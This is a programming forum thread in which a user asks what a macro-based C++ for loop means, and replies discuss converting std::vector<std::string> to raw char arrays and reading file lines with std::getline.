- Interfaces - Object Cloning - Inner Classes - Proxies - Interfaces - Object Cloning - Inner Classes - Proxies You have now seen all the basic tools for object-oriented programming in Java. This chapter shows you two advanced techniques that are very commonly used. Despite their less obvious nature, you will need to master them to complete your Java tool chest. The first, called an interface, is a way of describing what classes should do, without specifying how they should do it. A class can implement one or more interfaces. You can then use objects of these implementing classes anytime that conformance to the interface is required. After we cover interfaces, we take up cloning an object (or deep copying, as it is sometimes called). A clone of an object is a new object that has the same state as the original but a different identity. In particular, you can modify the clone without affecting the original. Finally, we move on to the mechanism of inner classes. Inner classes are technically somewhat complexthey are defined inside other classes, and their methods can access the fields of the surrounding class. Inner classes are useful when you design collections of cooperating classes. In particular, inner classes are important to write concise, professional-looking code to handle graphical user interface events. This chapter concludes with a discussion of proxies, objects that implement arbitrary interfaces. A proxy is a very specialized construct that is useful for building system-level tools. You can safely skip that section on first reading. Interfaces In the Java programming language, an interface is not a class but a set of requirements two objects and return an indication whether x or y is larger. The method is supposed to return a negative number if x is smaller than y, zero if they are equal, and a positive number otherwise. This particular interface has a single method. Some interfaces have more than one method.we will look at them later in some detail. Now suppose we want to use the sort method of the Arrays class to sort an array of Employee objects. Then the Employee class must implement the Comparable interface. To make a class implement an interface, you have a compareTo method that returns -1 if the first employee's salary is less than the second employee's salary, 0 if they are equal, and 1 otherwise. public int compareTo(Object otherObject) { Employee other = (Employee)otherObject; if (salary < other.salary) return -1; if (salary > other.salary) return 1; return 0; } NOTE In the interface declaration, the compareTo method was not declared public because all methods in an interface are automatically public. However, when implementing the interface, you must declare the method as public. Otherwise, the compiler assumes that the method has package visibilitythe default for a class. Then the compiler complains that you try to supply a weaker access privilege. NOTE The compareTo method of the Comparable interface returns an integer. If the objects are not equal, it does not matter what negative or positive value you return. This flexibility can be useful when comparing integer fields. For example, suppose each employee has a unique integer id, and you want to sort by employee ID number. Then you can simply return id - other.id. That value will be some negative value if the first ID number is less than the other, 0 if they are the same ID, and some positive value otherwise. However, there is one caveat: The range of the integers must be small enough that the subtraction does not overflow. If you know that the IDs are not negative or that their absolute value is at most(Integer.MAX_VALUE - 1) / 2, you are safe. Of course, the subtraction trick doesn't work for floating-point numbers. The difference salary - other.salary can round to 0 if the salaries are close together but not identical. Now you saw what a class must do to avail itself of the sorting service language is strongly typed. When making a method call, the compiler needs to be able to check that the method actually exists. Somewhere in the sort method, there. NOTE You would expect that the sort method in the Arrays class is defined to accept a Comparable[] array, so that the compiler can complain if anyone ever calls sort with an array whose element type doesn't implement the Comparable interface. Sadly, that is not the case. Instead, the sort method accepts an Object[] array and uses a clumsy cast: // from the standard library--not recommended if (((Comparable)a[i]).compareTo((Comparable)a[j]) > 0) { // rearrange a[i] and a[j] . . . } If a[i] does not belong to a class that implements the Comparable interface, then the virtual machine throws an exception. (Note that the second cast to Comparable is not necessary because the explicit parameter of the compareTo method has type Object, not Comparable.) See Example 61 for the full code for sorting of an employee array. Example 61: EmployeeSortTest.java 1. import java.util.*; 2. 3. public class EmployeeSortTest 4. { public static void main(String[] args) 5. { Employee[] staff = new Employee[3]; 6. 7. staff[0] = new Employee("Harry Hacker", 35000); 8. staff[1] = new Employee("Carl Cracker", 75000); 9. staff[2] = new Employee("Tony Tester", 38000); 10. 11. Arrays.sort(staff); 12. 13. // print out information about all Employee objects 14. for (int i = 0; i < staff.length; i++) 15. { Employee e = staff[i]; 16. System.out.println("name=" + e.getName() 17. + ",salary=" + e.getSalary()); 18. } 19. } 20. } 21. 22. class Employee implements Comparable 23. { public Employee(String n, double s) 24. { name = n; 25. salary = s; 26. } 27. 28. public String getName() 29. { return name; 30. } 31. 32. public double getSalary() 33. { return salary; 34. } 35. 36. public void raiseSalary(double byPercent) 37. { double raise = salary * byPercent / 100; 38. salary += raise; 39. } 40. 41. /** 42. Compares employees by salary 43. @param otherObject another Employee object 44. @return a negative value if this employee has a lower 45. salary than otherObject, 0 if the salaries are the same, 46. a positive value otherwise 47. */ 48. public int compareTo(Object otherObject) 49. { Employee other = (Employee)otherObject; 50. if (salary < other.salary) return -1; 51. if (salary > other.salary) return 1; 52. return 0; 53. } 54. 55. private String name; 56. private double salary; 57. } java.lang.Comparable 1.0 int compareTo(Object otherObject) compares this object with otherObject and returns a negative integer if this object is less than otherObject, zero if they are equal, and a positive integer otherwise. NOTE According to the language standard: "The implementor must ensure sgn(x.compareTo(y)) = -sgn(y.compareTo(x)) for all x and y. (This implies that x.compareTo(y) must throw an exception if y.compareTo(x) throws an exception.)" Here, "sgn" is the sign of a number: sgn(n) is -1 if n is negative, 0 if n equals 0, and 1 if n is positive. In plain English, if you flip the parameters of compareTo, the sign (but not necessarily the actual value) of the result must also flip. That's not a problem, but the implication about exceptions is tricky. Suppose Manager has its own comparison method that compares two managers. It might start like this: public int compareTo(Object otherObject) { Manager other = (Manager)otherObject; . . . } NOTE That violates the "antisymmetry" rule. If x is an Employee and y is a Manager, then the call x.compareTo(y) doesn't throw an exceptionit simply compares x and y as employees. But the reverse, y.compareTo(x)throws a ClassCastException. The same issue comes up when programming an equals method. However, in that case, you simply test if the two classes are identical, and if they aren't, you know that you should return false. However, if x and y aren't of the same class, it is not clear whether x.compareTo(y) should return a negative or a positive value. Maybe managers think that they should compare larger than any employee, no matter what the salary. But then they need to explicitly implement that check. If you don't trust the implementors of your subclasses to grasp this subtlety, you can declare compareTo as a final method. Then the problem never arises because subclasses can't supply their own version. Conversely, if you implement a compareTo method of a subclass, you need to provide a thorough test. Here is an example: if (otherObject instanceof Manager) { Manager other = (Manager)otherObject; . . . } else if (otherObject instanceof Employee) { return 1; // managers are always better :-( } else return -((Comparable)otherObject).compareTo(this); java.util.Arrays 1.2 static void sort(Object[] a) sorts the elements in the array a, using a tuned mergesort algorithm. All elements in the array must belong to classes that implement the Comparable interface, and they must all be comparable to each other. Properties of Interfaces Interfaces are not classes. In particular, you can never use the new operator to instantiate an interface: x = new Comparable(. . .); // ERROR However, even though you can't construct interface objects, you can still declare sinterface variables. Comparable x; // OK An interface variable must refer to an object of a class that implements the interface: x = new Employee(. . .); // OK provided Employee implements Comparable Next, just as you use instanceof to check if an object is of a specific class, you can use instanceof to check if. NOTE It is legal to tag interface methods as public, and fields as public static final. Some programmers do that, either out of habit or for greater clarity. However, the Java Language Specification recommends not to supply the redundant keywords, and we follow that recommendation.. While each class can only have); } Then the Employee class would give most of the benefits of multiple inheritance while avoiding the complexities and inefficiencies. NOTE C++ has multiple inheritance and all the complications that come with it, such as virtual base classes, dominance rules, and transverse pointer casts. Few C++ programmers use multiple inheritance, and some say it should never be used. Other programmers recommend using multiple inheritance only for "mix-in" style inheritance. In the mix-in style, a primary base class describes the parent object, and additional base classes (the so-called mix-ins) may supply auxiliary characteristics. That style is similar to a Java class with a single base class and additional interfaces. However, in C++, mix-ins can add default behavior, whereas Java interfaces cannot. NOTE Microsoft has long been a proponent of using interfaces instead of using multiple inheritance. In fact, the Java notion of an interface is essentially equivalent to how Microsoft's COM technology uses interfaces. As a result of this unlikely convergence of minds, it is easy to supply tools based on the Java programming language to build COM objects (such as ActiveX controls). This is done (pretty much transparently to the coder) in, for example, Microsoft's J++ product and is also the basis for Sun's JavaBeans-to-ActiveX bridge. Interfaces and Callbacks A common pattern in programming is the callback pattern. In this pattern, you want to specify the action that should occur whenever a particular event happens. For example, you may want a particular action to occur when a button is clicked or a menu item is selected. However, since you have not yet seen how to implement user interfaces, we will consider a similar but simpler situation. The javax.swing class contains a Timer class that is useful if you want to be notified whenever a time interval has elapsed. For example, if a part of your program contains a clock, then you can ask to be notified every second so that you can update the clock face. When you construct a timer, you set the time interval, and you tell it what it should do whenever the time interval has elapsed. How do you tell the timer what it should do? In many programming languages, you supply the name of a function that the timer should call periodically. However, the classes in the Java standard library take an object-oriented approach. You pass an object of some class. The timer then calls one of the methods on that object. Passing an object is more flexible than passing a function because the object can carry additional information. Of course, the timer needs to know what method to call. The timer requires that you specify an object of a class that implements the ActionListener interface of the java.awt.event package. Here is that interface: public interface ActionListener { void actionPerformed(ActionEvent event); } The timer calls the actionPerformed method when the time interval has expired. NOTE As you saw in Chapter 5, Java does have the equivalent of function pointers, namely, Method objects. However, they are difficult to use, slower, and cannot be checked for type safety at compile time. Whenever you would use a function pointer in C++, you should consider using an interface in Java. Suppose you want to print a message "At the tone, the time is . . .," followed by a beep, once every ten seconds. You need to define a class that implements the ActionListener interface. Then place whatever statements you want to have executed inside the actionPerformed method. class TimePrinter implements ActionListener { public void actionPerformed(ActionEvent event) { Date now = new Date(); System.out.println("At the tone, the time is " + now); Toolkit.getDefaultToolkit().beep(); } } Note the ActionEvent parameter of the actionPerformed method. This parameter gives information about the event, such as the source object that generated itsee Chapter 8 for more information. However, detail information about the event is not important in this program, and you can safely ignore the parameter. Next, you construct an object of this class and pass it to the Timer constructor. ActionListener listener = new TimePrinter(); Timer t = new Timer(10000, listener); The first parameter of the Timer constructor is the time interval that must elapse between notifications, measured in milliseconds. We want to be notified every ten seconds. The second parameter is the listener object. Finally, you start the timer. t.start(); Every ten seconds, a message like At the tone, the time is Thu Apr 13 23:29:08 PDT 2000 is displayed, followed by a beep. Example 62 puts the timer and its action listener to work. After the timer is started, the program puts up a message dialog and waits for the user to click the Ok button to stop. While the program waits for the user, the current time is displayed in ten second intervals. Be patient when running the program. The "Quit program?" dialog box appears right away, but the first timer message is displayed after ten seconds. Note that the program imports the javax.swing.Timer class by name, in addition to importing javax.swing.* and java.util.*. This breaks the ambiguity between javax.swing.Timer and java.util.Timer, an unrelated class for scheduling background tasks. Example 62: TimerTest.java 1. import java.awt.*; 2. import java.awt.event.*; 3. import java.util.*; 4. import javax.swing.*; 5. import javax.swing.Timer; 6. // to resolve conflict with java.util.Timer 7. 8. public class TimerTest 9. { 10. public static void main(String[] args) 11. { 12. ActionListener listener = new TimePrinter(); 13. 14. // construct a timer that calls the listener 15. // once every 10 seconds 16. Timer t = new Timer(10000, listener); 17. t.start(); 18. 19. JOptionPane.showMessageDialog(null, "Quit program?"); 20. System.exit(0); 21. } 22. } 23. 24. class TimePrinter implements ActionListener 25. { 26. public void actionPerformed(ActionEvent event) 27. { 28. Date now = new Date(); 29. System.out.println("At the tone, the time is " + now); 30. Toolkit.getDefaultToolkit().beep(); 31. } 32. } javax.swing.JOptionPane 1.2 static void showMessageDialog(Component parent, Object message) displays a dialog box with a message prompt and an Ok button. The dialog is centered over the parent component. If parent is null, the dialog is centered on the screen. javax.swing.Timer 1.2 Timer(int interval, ActionListener listener) constructs a timer that notifies listener whenever interval milliseconds have elapsed. void start() starts the timer. Once started, the timer calls actionPerformed on its listeners. void stop() stops the timer. Once stopped, the timer no longer calls actionPerformed on its listeners javax.awt.Toolkit 1.0 static Toolkit getDefaultToolkit() gets the default toolkit. A toolkit contains information about the graphical user interface environment. void beep() Emits a beep sound.
http://www.informit.com/articles/article.aspx?p=31110&amp;seqNum=4
CC-MAIN-2017-04
refinedweb
2,727
58.79
Business scenario – A logistics system is sending Sales Area Information to a remote SFTP server via HCI. The message should be sent to the SFTP server only if the Sales Org field has a particular value else the flow should be terminated. Intention – To understand the Gateway / Persist / terminate steps with an asynchronous scenario in HCI ( SOAP to SFTP ) including the testing and monitoring. Pre-requisites – - SOAP UI (SOAP UI 4.0.1 version or later versions) - Eclipse with HCI plug-ins - Tenant ID and access to HCI Download Eclipse and install HCI plugins : Download eclipse from and choose the Windows 64 bit option ( based on your OS) On the home page , Go to Help and choose ‘Install New Software’. Click Add Button and give the below URL: and select ‘ Hana Cloud Integration’ option on the next screen. This completed the installation of HCI plugins in eclipse. Note: HCI config can also be done using WEBUI apart from this eclipse option Tenant connection : Setup eclipse with your tenant Create Integration Project and Iflow: We will create the Integration Project which will hold our Iflow. Go to File -> New -> other and choose Sap Hana Cloud Integration. Select Integration Project and click next. Then create the Iflow as specified under. Configure Sender and Channels : Click on the sender and give a name to sender system. select properties – > Basic authentication for the purpose of simplicity Import the WSDL : Click on “src.main.resources.wsdl” – right click and import the Sales Area WSDL. We will need this in the Sender channel config. We will import 2 WSDLS – one for source ( SalesArea.wsdl ) and other for target ( Sales_Area_tgt.wsdl ) Src WSDL – will have 3 fields. SalesOrg / DistrChannel / Division Tgt WSDL – will have 4 fields SalesOrg / DistrChannel / Division / country . Country will be hard coded in mapping. Sender SOAP channel : Address : Specify any logical name like /SalesArea . This will be part of the endpoint which will be generated later. URL to WSDL : click browse and select SalesArea ( Src WSDL ) Processing settings : Standard – For Async scnearios Robust – For Sync scenarios where the response goes back to sender. Mapping : Right click on “src.main.resources.mapping” – > new -> other -> HCI -> message mapping. Select the source and target message in the mapping Complete the one to one mapping and harcode the country code to ‘US’ ‘Console’ will automatically show any errors upon saving the mapping Click on the connection between start and end . Then Right click and “Add Message Transformers” -> ” Mapping” Then right click and assign the mapping u just created Gateway config : Requirement is that the message should go the receiver only when Sales Org = ‘A001’ else it should be terminated without any error / exception. click on the connection between mapping and end step . Right click “Add message routin” -> “Router” Click on the connection between Gateway and End. Click on properties and put a name like ‘Salesorg’. Condition expression : /p1:SalesArea/Salesorg=’A001′ Click on “Gateway” and remove “Raise Alert” and “Throw Exception” . End Message : Click on end message event from right side and drag it inside the Iflow. Then draw the connector between them. Give the name as “NotSalesOrg” and click on “Default Route” Check the namespace mapping : Goto “Runtime configuration ” and see the right name space mapping is shown there. Message persistence : Click on the line between mapping and gateway and click on message persistece Deploy the Iflow : Now right click and deploy your Iflow Console shows that the deployment was successful. WEBUI : You can use the tenant url to go the webui -> overview section to monitor / check your Iflows. Click on All started You will be able to see the endpoint and final Iflow. This endpoint should be used in SOAP UI to test. View Integration flow – will show the final deployed Iflow Monitor Message Processing – will be used for monitoring your messages after you test. Final Iflow : SOAP UI testing : As you can see here endpoint is taken from the webui as previously mentioned. Also specify thee HCI user/pwd as ‘Basic authentication’ This is an Asynchronous scenario and hence no response is seen …only . HTTP / 1.1 202 Accepted. Monitoring : Go to web ui – > click on completed messages Go to ” Message processing log” . You can see the message is COMPLETED. NOTE : This Blog does not show the receiver SFTP config as it follows standard steps. The receiver channel and system have been removed from the Iflow Solid information. Thanks Tarang . Excellent Step by Step information. Keep Blogging!.
https://blogs.sap.com/2016/08/31/hci-understanding-the-gateway-persist-terminate-function/
CC-MAIN-2017-30
refinedweb
742
64.3
: Tue, 20 Jul 2004 20:14:27 -0700, na gmane.comp.python.webware, Mark Phillips napisa=B3(a): > I added a new def of my own to XMLRPCExamples.py and added "import =20 > os.path" to the top of the file. >=20 > def getmydoc(self, filepath): > if not os.path.exists(filepath): > # the file just ain't there > result =3D "File not found" > else: > result =3D "The file is present" > return result >=20 > Then I repeated the test procedure and included > >>> server.getmydoc('a valid path') >=20 > This produced a fault: >=20 > xmlrpclib.Fault: <Fault 1: 'Traceback (most recent call last):\n File = =20 > "WebKit/XMLRPCServlet.py", line 44, in respondToPost\n File =20 > "WebKit/RPCServlet.py", line 15, in call\nNotImplementedError: =20 > getmydoc\n'> ... > What have I overlooked? Maybe you did not add your method to exposedMethods()? def exposedMethods(self): return ['getmydoc', 'add'] -- JZ Warning: I have just started with Python 2.3 for MacOS 10.3.4 and Webware 0.8.1. I have installed Webware and the started AppServer. The standard tests work fine. >>> import xmlrpclib >>> server = xmlrpclib.Server(' XMLRPCExample') >>> server.multiply(10,20) I added a new def of my own to XMLRPCExamples.py and added "import os.path" to the top of the file. def getmydoc(self, filepath): if not os.path.exists(filepath): # the file just ain't there result = "File not found" else: result = "The file is present" return result Then I repeated the test procedure and included >>> server.getmydoc('a valid path') This produced a fault: xmlrpclib.Fault: <Fault 1: 'Traceback (most recent call last):\n File "WebKit/XMLRPCServlet.py", line 44, in respondToPost\n File "WebKit/RPCServlet.py", line 15, in call\nNotImplementedError: getmydoc\n'> I tried reloading the server cache and also stop/restart the appserver. No joy. I have tried a number of modifications of XMLRPCExample.py and none of them are reflected in the test procedure. It is as if the file is not being interpreted/compiled. What have I overlooked? Mark Phillips Mophilly & Associates On the web at On the phone at 619 444-9210 On Jul 21, 2004, at 12:39 AM, JZ wrote: > Tue, 20 Jul 2004 20:14:27 -0700, na gmane.comp.python.webware, Mark > Phillips napisa=C5=82(a): > >> What have I overlooked? > > Maybe you did not add your method to exposedMethods()? > > def exposedMethods(self): > return ['getmydoc', 'add'] > > -- > JZ That is a good suggestion. The truth is, and I kinda hate to admit=20 this, I didn't realize the file I was editing was not the file being=20 used by AppServer. Sometimes being a Newbie really bytes.
https://sourceforge.net/p/webware/mailman/message/13907196/
CC-MAIN-2016-44
refinedweb
437
70.09
[ ] ASF GitHub Bot commented on THRIFT-2642: ---------------------------------------- Github user juliengreard commented on a diff in the pull request: --- Diff: lib/py/src/ext/types.cpp --- @@ -20,6 +20,8 @@ #include "ext/types.h" #include "ext/protocol.h" +#include <iostream> --- End diff -- I usually include built-in lib first > Recursive structs don't work in python > -------------------------------------- > > Key: THRIFT-2642 > URL: > Project: Thrift > Issue Type: Bug > Components: Python - Compiler, Python - Library > Affects Versions: 0.9.2 > Reporter: Igor Kostenko > Assignee: Eric Conner > > Recursive structs in 0.9.2 work fine in c++ & c#, but not in python, because generated code trying to use objects which not constructed yet. > Struct: > {code} > struct Recursive { > 1: list<Recursive> Children > } > {code} > Python code: > {code} > class Recursive: > thrift_spec = ( > None, # 0 > (1, TType.LIST, 'Children', (TType.STRUCT,(Recursive, Recursive.thrift_spec)), None, ), # 1 > ) > {code} > Error message: > {code} > Traceback (most recent call last): > File "ttypes.py", line 20, in <module> > class Recursive: > File "ttypes.py", line 28, in Recursive > (1, TType.LIST, 'Children', (TType.STRUCT,(Recursive, Recursive.thrift_spec)), None, ), # 1 > NameError: name 'Recursive' is not defined > {code} -- This message was sent by Atlassian JIRA (v6.4.14#64029)
http://mail-archives.apache.org/mod_mbox/thrift-dev/201707.mbox/%3CJIRA.12730761.1406717939000.178319.1499293440487@Atlassian.JIRA%3E
CC-MAIN-2021-49
refinedweb
188
59.4
I'm currently trying to build the functionality directly in django's ORM as a cascade of functions that would retrieve matches in decreasing relevance, eg: class Article(meta.Model): title = meta.CharField() description = meta.TextField() keywords = meta.CharField() def search(request, term): matches = [] matches.extend(findExactTitle(term)) matches.extend(findInTitle(term)) matches.extend(findInKeywords(term)) matches.extend(findInDescription(term)) render_to_response('search_results', {'matches': matches} Any ideas? Suggestions? I haven't yet had an opportunity to use it myself, but it seems to be what you're looking for. -- "May the forces of evil become confused on the way to your house." -- George Carlin At World Online, the search engine (lawrence.com/search, ljworld.com/search) uses swish-e () to index files. We made a small script that reads a custom Django setting (FULL_TEXT_INDEXING) to find out which models need to be indexed. The indexer runs on a regular basis; for each to-be-indexed model, it grabs all items in the system using get_list() (with optional limiting kwargs designated in FULL_TEXT_INDEXING), renders each result in a template according to its content type, and indexes the resulting rendered template. Then, when somebody does a search on the site, we use swish-e's Python bindings to retrieve the IDs of the objects that match the search criteria. Then we use Django's get_in_bulk() to retrieve the actual objects. get_in_bulk() takes a list of IDs and returns a dictionary of {id: object}. (Trivia: get_in_bulk() was created to solve this exact problem.) Hope that helps! It would be pretty cool to open-source this mini search framework and pop it in django/contrib, but that would be up to Jacob to decide. Adrian -- Adrian Holovaty holovaty.com | djangoproject.com | chicagocrime.org Jacob Doesn't Swish-e pose an incompatibility for licensing? Everything Django has been BSD up to this point and I would hate to see anything alter this. Isn't swish-e gpl? Regards, David - Hide quoted text -- Show quoted text - > On Dec 29, 2005, at 9:31 AM, Adrian Holovaty wrote: >> At World Online, the search engine (lawrence.com/search, >> ljworld.com/search) uses swish-e () to index files. > [snip] >> Hope that helps! It would be pretty cool to open-source this mini >> search framework and pop it in django/contrib, but that would be up to >> Jacob to decide. > I'd love to open it up; I don't see any reason that we'd need to keep > it hidden. I'll put it on my todo list :) > Jacob > Doesn't Swish-e pose an incompatibility for licensing? Everything Django > has been BSD up to this point and I would hate to see anything alter > this. Isn't swish-e gpl? > Swish-e grants a special exemption from automatically GPL'ing linked > programs which use the libswish-e API interface: > Seriously, though, this licensing stuff sucks :(
http://groups.google.com/group/django-users/browse_thread/thread/6e3bbbe601299588/52ad2857016dc95b%3Flnk=gst&q=search&rnum=2
crawl-002
refinedweb
476
57.87
Ok, so I'm taking a class in Java. I've already turned in this assignment but after doing so I got to thinking about a piece of code that I came up with to solve a problem. I was wondering what better way there might be. As a rule (because the class hasn't learned it, though I know it already) we can't use arrays, which I complained to the teacher because I think it would make the whole assigment easier. Bascially, it's a slot machine, 3 slots and 6 symbols (using text to simulate) at the end I have to count matching slots and pay accordingly. When you see my code you'll see a method that I came up with, but I was wondering if there were an easier way. Mainly because I want to up scale it to 5 slots I can see how I would have to modify my existing code, but not sure if then there was an easier way. Here's the entire code: Code : package slot.machine; import java.util.Random; import java.util.Scanner; public class SlotMachine { public static void main(String[] args) { Scanner kb = new Scanner(System.in); Random rnd = new Random(); int rndSlot1, rndSlot2, rndSlot3, betAmnt, matches, multiplier; int totalWinning = 0, totalBet = 0, cntPlays = 0; do { // Let's get the slots first, casino style programming ;) rndSlot1 = rnd.nextInt(5); rndSlot2 = rnd.nextInt(5); rndSlot3 = rnd.nextInt(5); // Let's (re)set some things matches = 0; multiplier = 0; // Get bet from user System.out.print("Please enter bet amount (0 to quit): "); betAmnt = kb.nextInt(); if(betAmnt > 0) // If they want to play... { cntPlays++; //Number of games player...just for fun. totalBet += betAmnt; // Accumulate total bets // Display Results switch(rndSlot1) { case 0: System.out.print("\nCherries "); break; case 1: System.out.print("\nOranges "); break; case 2: System.out.print("\nPlums "); break; case 3: System.out.print("\nBells "); break; case 4: System.out.print("\nMelons "); break; case 5: System.out.print("\nBars "); break; default: // Shouldn't Get here... System.out.print("\nTILT! "); // Or "Error!" or something like that break; } switch(rndSlot2) { case 0: System.out.print("Cherries "); break; case 1: System.out.print("Oranges "); break; case 2: System.out.print("Plums "); break; case 3: System.out.print("Bells "); break; case 4: System.out.print("Melons "); break; case 5: System.out.print("Bars "); break; default: // Shouldn't Get here... System.out.print("TILT! "); // Or "Error!" or something like that break; } switch(rndSlot3) { case 0: System.out.println("Cherries"); break; case 1: System.out.println("Oranges"); break; case 2: System.out.println("Plums"); break; case 3: System.out.println("Bells"); break; case 4: System.out.println("Melons"); break; case 5: System.out.println("Bars"); break; default: // Shouldn't Get here... System.out.print("TILT!"); // Or "Error!" or something like that break; } //; } if(multiplier > 0) // See if they won anything this time { totalWinning += (betAmnt * multiplier); // Accumulate Total Winnings System.out.println("\nCongratulations, you've won : $" + (betAmnt * multiplier)); } else { System.out.println("\nSorry, please try again"); } } } while(betAmnt > 0); System.out.println("\nThank you for playing.\n"); System.out.println("Your total winnings: " + totalWinning); System.out.println("Your total bets: " + totalBet); System.out.println("You lost/gained: " + (totalWinning - totalBet) + " in " + cntPlays + " pulls."); } } Particularly these lines: Code : //; } So, thoughts? What is a better way to find matches between variables (all ints) without over counting (My first code made that mistake, but I fixed it and resubmitted it to my teacher in time)
http://www.javaprogrammingforums.com/%20whats-wrong-my-code/18580-simple-question-curiosity-not-really-important-printingthethread.html
CC-MAIN-2015-32
refinedweb
578
53.58
> From: Juan José García-Ripoll > <address@hidden> > Date: Mon, 30 Mar 2020 09:54:26 +0200 > > > Please point to the relevant APIs, to make the discussion more > > practical. > > GDI+ is an evolution of GDI that supports arbitrary plug-ins for image > formats, > both bitmaps and vector type. It is a bit more modern than GDI, from what I > get, but, just as GDI, it is not the modern standard for Windows 2D > displays. Indeed, it is old enough that it is also supported by Windows XP. > > > > GDI+ has a flat C interface that allows loading images, querying properties, > displaying them and converting them to older GDI formats. > > Thanks. Interesting, I didn't know GDI+ had a C API. Did you verify using these APIs will allow us to keep using the code which processes images at display time? Will image scaling and rotation still work as it does now? What about masking? > - At configuration time, it works just as the NextStep (NS) system, disabling > the use of libpng, libjpeg, libtiff and libgif when the build system is > Mingw. AFAIU, we will also be able to support EXIF without ImageMagick. > - In images such as PNG, GIF or TIFF, it currently does not use a bitmask for > display. Instead, it relies on GDI+'s convertion to HBITMAP, which allows > alpha blending with any background color of choice. I don't know enough to understand what that means, but if this doesn't lose functionality, it's OK. > - In the C code, it replaces the load_jpeg, load_gif, etc, with a generic > w32_load_image() function in src/w32image.c. This function is heavily > inspired by ns_load_image() in src/nsimage.c. There's a complication we must consider in this regard, see below. > The only thing that is missing is a place to call GdipShutdown(). I do not > know > how to add an exit handler for Emacs' C core. I think you want to do it in w32.c:term_ntproc. > I have also verified that it is possible to convert all *.xpm icons to *.png > format and thus eliminate the need to include libXpm-noX.dll. Plus, the size > of > the icons is reduced by 50% We aren't going to get rid of XPM icons in the distribution any time soon (because of other platforms), so I don't see an urgent need to do this. > --- a/src/image.c > +++ b/src/image.c > @@ -18,6 +18,12 @@ Copyright (C) 1989, 1992-2020 Free Software Foundation, > Inc. > along with GNU Emacs. If not, see <>. */ > > #include <config.h> > +#ifdef HAVE_GDIPLUS > +#undef HAVE_JPEG > +#undef HAVE_PNG > +#undef HAVE_GIF > +#undef HAVE_TIFF > +#endif We cannot do this at compile time, because we still try supporting ancient Windows versions where GDI+ is not available. Moreover, I think it's good to let users have the ability to decide dynamically which image display capability they want. It certainly makes sense to do that initially, while the GDI+ way is being tested in all kinds of real-life use cases. So all the compile-time tests will have to be rewritten as run-time tests, and we should provide variables to force Emacs use/not use GDI+, perhaps at image format granularity, and expose those variables to Lisp, so users could control that. A few other minor comments about the code below: > +#elif defined HAVE_GDIPLUS > > -#endif /* HAVE_NS */ > +static bool > +png_load (struct frame *f, struct image *img) > +{ > + return w32_load_image (f, img, > + image_spec_value (img->spec, QCfile, NULL), > + image_spec_value (img->spec, QCdata, NULL)); > +} > + > +#define init_png_functions init_w32_image_load_functions And this stuff will have to learn to coexist with the current code which loads PNG etc. images using the respective libraries. > +static int > +gdiplus_initialized_p() Style: we use ANSI C99 declarations, so please say static int gdiplus_initialized_p (void) (Btw, it looks like this function should return a 'bool', not 'int'. Also, please leave a space between the end of the function/macro name and the opening parentheses. > + static int gdip_initialized = 0; No need to initialize a static variable to a zero value. > + if (gdip_initialized < 0) > + { > + return 0; > + } > + else if (gdip_initialized) > + { > + return 1; > + } Style: we don't use braces when a block has only one line. > + status = GdiplusStartup(&token, &input, &output); ^^ Style: space missing there. > +static float > +w32_frame_delay(GpBitmap *pBitmap, int frame) A nit: why 'float' and not 'double'? 'float' causes a minor inefficiency, so unless there's a good reason, I'd prefer 'double'. > + // Assume that the image has a property item of type > PropertyItemEquipMake. > + // Get the size of that property item. Please use C-style comments /* like this */, not C++-style comments. > + fprintf(stderr, "FrameCount: %d\n", (int)frameCount); > + fprintf(stderr, " index: %d\n", frame); Are these left-overs from the debugging stage? > +static ARGB > +w32_image_bg_color(struct frame *f, struct image *img) > +{ > + /* png_color_16 *image_bg; */ ^^^^^^^^^^^^^^^^^^^^^^^ And this? > + if (STRINGP (specified_bg) > + ? FRAME_TERMINAL (f)->defined_color_hook (f, > + SSDATA (specified_bg), > + &color, > + false, > + false) > + : (FRAME_TERMINAL (f)->query_frame_background_color (f, &color), > + true)) Do we really need to go through the hook mechanism here? The frame type is known in advance, right? > + if (STRINGP (spec_file)) > + { > + filename_to_utf16 (SSDATA (spec_file) , filename); > + status = GdipCreateBitmapFromFile (filename, &pBitmap); What to do here if w32-unicode-filenames is nil? > + else if (STRINGP (spec_data)) > + { > + IStream *pStream = SHCreateMemStream ((BYTE *) SSDATA (spec_data), > + SBYTES (spec_data)); Are we sure spec_data is a unibyte string here? Do we need an assertion or maybe a test and a conversion? > + /* In multiframe pictures, select the first one */ Style: comments should end with a period and 2 spaces before */.
https://lists.gnu.org/r/emacs-devel/2020-03/msg00865.html
CC-MAIN-2020-29
refinedweb
896
63.59
If found some source code that has this in it Posted 25 December 2012 - 07:53 PM If found some source code that has this in it Posted 25 December 2012 - 08:10 PM for(i; i < sLines.size(); i++) L. Spiro My Art: My Music: L. Spiro Engine: L. Spiro Engine Forums: Posted 25 December 2012 - 08:34 PM ok thanks sorry for asking stupid question Posted 26 December 2012 - 08:36 AM Also, you can put the int inside the for() statement: for(int i; i < sLines.size(); i++) The difference is whether 'i' goes in the scope outside the for() loop or not. Usually you don't want that, but occasionally you do. The code seems to be converting an std::vector of std::strings to a dynamically allocated raw array of raw strings. That's like going from driving a good car with airbags and your seatbelt on (perfectly safe), to ducktaping yourself to the belly of an elephant (dangerous, messy, and in most situations just plain dumb). Are you sure the code you are converting actually needs to make the std::vector<std::string> to char*[]?] Posted 26 December 2012 - 11:50 AM In case you use GCC, you can compile with -save-temps to trivially figure out any macro abuse, no matter how convoluted it is. For every file foo.c you will find a file foo.ii generated, which contains the output of the preprocessor (i.e. with everything included, and all macros expanded). I've found this immensely helpful at times. Posted 26 December 2012 - 01:06 PM I'm with Servant of the Lord on this. Are you really sure you need to do this? Sometimes you have to question the quality of your sources. In this case, it's not only converting away from std::string to unsafe raw strings that is a code smell, but the use of macros in this situation also smells nasty. Macro usage like this can conceal or even introduce bugs, and detracts from readability, making it a confusing mess for no real reason other than somebody thought they could save some typing. If they took shortcuts there, the remainder of their code might be smelly, too. What is it you are trying to accomplish in the larger scheme? Maybe we can help you figure out a less smelly method. Posted 26 December 2012 - 02:12 PM Edited by proanim, 26 December 2012 - 02:12 PM. Posted 26 December 2012 - 02:44 PM You're mixing things up here. First of all, fgets() is a C function (included via the header cstdio). You are reading from a file into a C-style array, then creating a C++ string from the line you read. This is pointless. C++ includes functionality for reading lines from files as well, without the limitation of reading to a fixed-length buffer: #include <fstream> #include <string> std::vector<std::string> sLines; std::ifstream infile("testfile.txt"); while(!infile.eof()) { std::string s; std::getline(infile, s); sLines.push_back(s); } infile.close(); getline() will read a string until a newline is encountered, without the maximum size limit of 255 that the fixed-length C-style read has. The allocation is invisibly handled by the string class. And no, you don't need to free sLines explicitly; it will be freed when it goes 